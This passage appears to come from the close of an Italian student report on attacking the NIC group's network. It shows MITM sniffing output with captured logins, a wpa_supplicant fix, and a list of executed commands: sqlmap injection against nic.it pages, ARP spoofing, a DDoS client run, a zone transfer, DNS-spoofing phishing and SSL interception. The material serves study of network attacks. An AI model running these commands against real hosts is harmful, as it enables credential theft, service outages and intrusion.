GROUP 2 : ANY (all the hosts in the list)

Starting Unified sniffing...

Text only Interface activated...

Hit 'h' for inline help

HTTP : 192.168.0.2:80 -> USER: wew PASS: ewew INFO: http://www.nic.it/

HTTP : 192.168.0.2:443 -> USER: 34 PASS: 34 INFO: https://www.nic.it/

HTTP : 192.168.0.2:80 -> USER: a PASS: b INFO: http://www.nic.it/

ESITO 3 : MITM + ARP POISON SSL HACKING (SUCCESS)

Con questo metodo recuperiamo tutti i dati di accesso dei malcapitati selezionati. Come abbiamo visto sia

su connessioni HTTP che HTTPS .

Cap

ito

lo: P

arte

QU

AR

TA: N

ote

38

PARTE QUARTA: NOTE

PROBLEMA CONFIGURAZIONE WIRELESS SOTTO LINUX (WPA_SUPPLICANT)

Il file di esempio di scrittura del file di configurazione di wpa_supplicant per autenticazione RADIUS aveva

una parametro errato che non mi permetteva di concludere l’autenticazione con l’AP.

Cosa che con windows funzionava, su questo devo dirlo (se pur con rammarico), windows - linux 1 a 0 in

questa partita .

Di seguito sono mostrati i parametri di connessione che ci interessano per collegarci al servizio offerto dal

gruppo NIC preso da wpa_supplicant.conf di esempio. In grassetto è evidenziato il parametro incriminato

che precludeva l’esito positivo dell’autenticazione

# EAP-PEAP/MSCHAPv2 configuration for RADIUS servers that use the new

peaplabel

# (e.g., Radiator)

network={

ssid="example"

key_mgmt=WPA-EAP

eap=PEAP

identity="[email protected]"

password="foobar"

ca_cert="/etc/cert/ca.pem"

phase1="peaplabel=1"

phase2="auth=MSCHAPV2"

priority=10

}

Cap

ito

lo: P

arte

QU

AR

TA: N

ote

39

File corretto per la connessione all’AP .

ctrl_interface_group=0

# general options

# Don't change this path to something else:

ctrl_interface=/var/run/wpa_supplicant

# Give everyone in the group "users" access to the control interface

# required if you want to dynamically configure the network via wpa_cli or

wpa_gui without being root

ctrl_interface_group=users

eapol_version=2

ap_scan=1

fast_reauth=1

#P-PEAP/MSCHAPv2 configuration for RADIUS servers that use the new peaplabel

# (e.g., Radiator)

network={

ssid="SalernoFly"

key_mgmt=WPA-EAP

eap=PEAP

pairwise=TKIP

group=TKIP

identity="provaprova"

password="provaprova"

ca_cert="/etc/cert/ca.pem"

phase1="peapver=0"

proto=WPA

phase2="auth=MSCHAPV2"

priority=10

}

Cap

ito

lo:

NO

TE :

CO

MA

ND

I ESE

GU

ITI

40

NOTE : COMANDI ESEGUITI

DIRECTORY /home/angelo/Desktop/SR_HACK/SR_HACK/ATTACCHI/

1 ATTACCO SQL-INJECTION

cd /home/angelo/Desktop/SR_HACK/SR_HACK/ATTACCHI/sqlinjection/sqlmap

python ./sqlmap.py -u https://www.nic.it/whois.php --method=POST --data="whois=camail.it" -v 1

python ./sqlmap.py -u https://www.nic.it/check_login.php --method=POST --

data="userid=camail&pwd=1"

2 ATTACCO DOS 1

cd /home/angelo/Desktop/SR_HACK/SR_HACK/ATTACCHI/SPOOFING/

echo 0 > /proc/sys/net/ipv4/ip_forward

iptables -F -t nat

./arpredirect 192.168.0.2 192.168.0.5

3 ATTACCO DDOS 1

cd /home/angelo/Desktop/SR_HACK/SR_HACK/ATTACCHI/DOS/ddnsf

./DDNSF_server &

./DDNSF_client start zombie.txt 192.168.0.5

./DDNSF_client stop zombie.txt 192.168.0.5

4 ATTACCO TRASFERIMENTO DI ZONE

dig [email protected] nic.it axfr

5 PHISHING

/opt/lampp/lampp start

ettercap -Tq -M arp -P dns_spoof /192.168.0.2/ /192.168.0.5/

Cap

ito

lo:

41

6 SSL HACKING

!echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -F -t nat

ettercap -Tq -M arp /192.168.0.2/ //

RIFERIMENTI

1. Hack Proofing – HANDBOOK SECONDA EDIZIONE

2. L'ARTE DELL'HACKING. - LE IDEE, GLI STRUMENTI, LE TECNICHE DEGLI HACKER -

john erickson

3. SourceForge www.sourceforge.com

4. Freshmeat www.freshmeat.net

5. Packetstorm http://packetstorm.security.com

6. RPMFind www.rpmfind.net

7. LinuxLinks www.linuxlinks.com

8. Tucows www.tucows.com

9. Startplaza www.startplaza.nu

10. SecurityFocus www.securityfocus.com

11. AtStake www.atstake.com

12. http://searchnetworking.techtarget.it/

http://www.sourceforge.com/

http://www.freshmeat.net/

http://packetstorm.security.com/

http://www.rpmfind.net/

http://www.linuxlinks.com/

http://www.tucows.com/

http://www.startplaza.nu/

http://www.securityfocus.com/

http://www.atstake.com/

http://searchnetworking.techtarget.it/

attacchi al gruppo nic - wordpress.commac address: 00:50:ba:c7:cc:a1 (d -link) warning: osscan...

Documents